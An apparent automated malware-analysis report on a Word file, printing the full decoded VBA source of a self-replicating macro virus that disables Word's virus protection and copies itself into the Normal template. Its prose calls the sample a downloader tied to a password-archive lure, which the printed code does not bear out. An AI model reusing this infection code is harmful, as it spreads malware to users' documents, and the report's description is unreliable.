Verdict: MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This document contains VBA macros, specifically a Document_Open macro designed to execute code upon opening. The macro attempts to replace its own code with content from the first 20 lines of the `ThisDocument` module, suggesting it's a downloader or dropper. The presence of a 'Password-protected archive handoff' heuristic indicates the macro may be intended to decrypt or retrieve a payload from an encrypted archive. The ClamAV detection further confirms its malicious nature.
Heuristics (6)
- ClamAV: Doc.Macro.APMPKILL-6097118-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found
  Disassembly
  Attempted x86 opcode disassembly
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `'KILL Private Sub Document_Open() On Error Resume Next`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: a8e47de383d7047002ffbc39050de92bda3cb4985642e0f4f5ddf8ca290054e7) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1086 bytes |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "AztSiw1, 0, 0, AZTSIWLib, AztSiw"
'APMP
'KILL
Private Sub Document_Open()
    On Error Resume Next
    Application.DisplayStatusBar = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
    Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
    If ThisDocument = NormalTemplate Then _
        Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
    With Host
        If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
            .DeleteLines 1, .CountOfLines
            .InsertLines 1, MyCode
            If ThisDocument = NormalTemplate Then _
                ActiveDocument.SaveAs ActiveDocument.FullName
        End If
    End With
End Sub
```